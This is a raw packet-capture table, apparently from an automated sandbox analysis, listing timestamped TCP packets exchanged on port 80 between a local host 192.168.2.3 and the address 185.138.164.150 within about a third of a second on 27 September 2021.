Sep 27, 2021 23:55:28.250287056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.251256943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.251283884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.251358986 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.251430035 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.251524925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.251549959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.251599073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.251744032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.251780033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.251799107 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.252314091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.252382994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.252394915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.255315065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.255338907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.255361080 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.255382061 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.255402088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.255448103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.255450010 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.255516052 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.284778118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.284811020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.284874916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.284991026 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.285048962 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.285089970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.285115004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.285156012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.285182953 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.285214901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.285264969 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.285314083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.286422014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.286453009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.286475897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.286495924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.286516905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.286541939 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.286583900 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.286675930 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.287065029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287090063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287132025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287162066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287189007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287230015 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.287250042 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.287348032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287374020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.287414074 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.291431904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.291641951 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.291687965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.291754007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.291784048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.291825056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.291856050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.291934967 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.291950941 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.319600105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.319612980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.319875956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.320436954 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.320518017 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.320521116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.320545912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.320588112 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.320594072 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.320662975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.320688009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.320709944 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.321355104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.321386099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.321408987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.321434021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.321468115 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.321481943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.321491003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.321559906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.321649075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.321979046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.322005033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.322029114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.322052956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.322076082 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.322094917 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.322169065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.322201967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.322221994 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.327713013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327749014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327773094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327795982 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327824116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327848911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327872038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327891111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.327986956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.328016043 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.328020096 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.354769945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.354808092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.354960918 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.355336905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.355364084 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.355386972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.355431080 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.355432034 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.355457067 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356098890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356187105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356261015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356302977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356323004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356347084 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356355906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356404066 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356406927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356448889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356496096 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356682062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356707096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356775999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356817961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356882095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.356940985 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.356971025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.357078075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.357100964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.357129097 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.363259077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363296032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363321066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363343954 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363379955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363408089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363451004 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.363456964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363493919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363506079 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.363567114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.363615990 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.389456034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.390494108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.390546083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.390571117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.390594006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.390652895 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.390685081 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.391396999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.391499996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.391511917 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.393752098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393795967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393829107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393850088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393872976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393894911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393910885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393923998 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.393927097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393942118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393956900 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393973112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.393989086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.394000053 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.394038916 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.398178101 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398217916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398242950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398266077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398293018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398314953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398336887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398341894 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.398361921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398381948 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.398387909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398412943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.398412943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.398442984 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.426409006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.426481962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.426541090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.426573038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.426579952 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.426606894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.426639080 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.426676035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.426702976 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.428925991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.428967953 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.428992033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429018974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429081917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429105043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429119110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.429177046 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.429212093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429235935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429258108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.429263115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429287910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429310083 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.429331064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429354906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.429378033 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.433681965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433727026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433749914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433773994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433809996 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.433824062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433883905 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.433904886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433936119 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.433950901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.433974981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.434001923 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.434012890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.434062958 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.434091091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461709976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461738110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461750031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461817980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461839914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461858988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.461986065 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.462105989 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.464385033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.464406967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.464418888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.464462996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.464550972 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.465148926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465166092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465182066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465219021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465220928 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.465267897 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.465629101 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465687990 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.465758085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465775013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465811014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.465825081 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.469074965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469144106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469166040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469181061 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.469239950 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.469265938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469293118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469310045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469336033 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.469445944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469476938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469497919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469521999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.469525099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.469548941 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.497056961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.497226000 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.498394012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498406887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498431921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498485088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498508930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498533010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498557091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.498627901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.498713017 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.503689051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.503736019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.503760099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.503865957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504054070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504074097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504223108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504242897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504261017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504412889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504431963 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504448891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.504880905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508260012 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.508454084 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508569956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508610010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508615971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508639097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508665085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508690119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.508831978 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.508891106 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.532983065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.533055067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.533087015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.533103943 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.536346912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.536386967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.536638021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.536645889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.536667109 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.536689997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546372890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546416998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546436071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546456099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546474934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546494961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546514034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546533108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546552896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546571970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546591997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.546610117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548176050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548180103 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.548199892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548218012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548234940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548250914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548254013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.548266888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548281908 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548297882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548299074 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.548314095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.548345089 CEST	49745	80	192.168.2.3	185.138.164.150
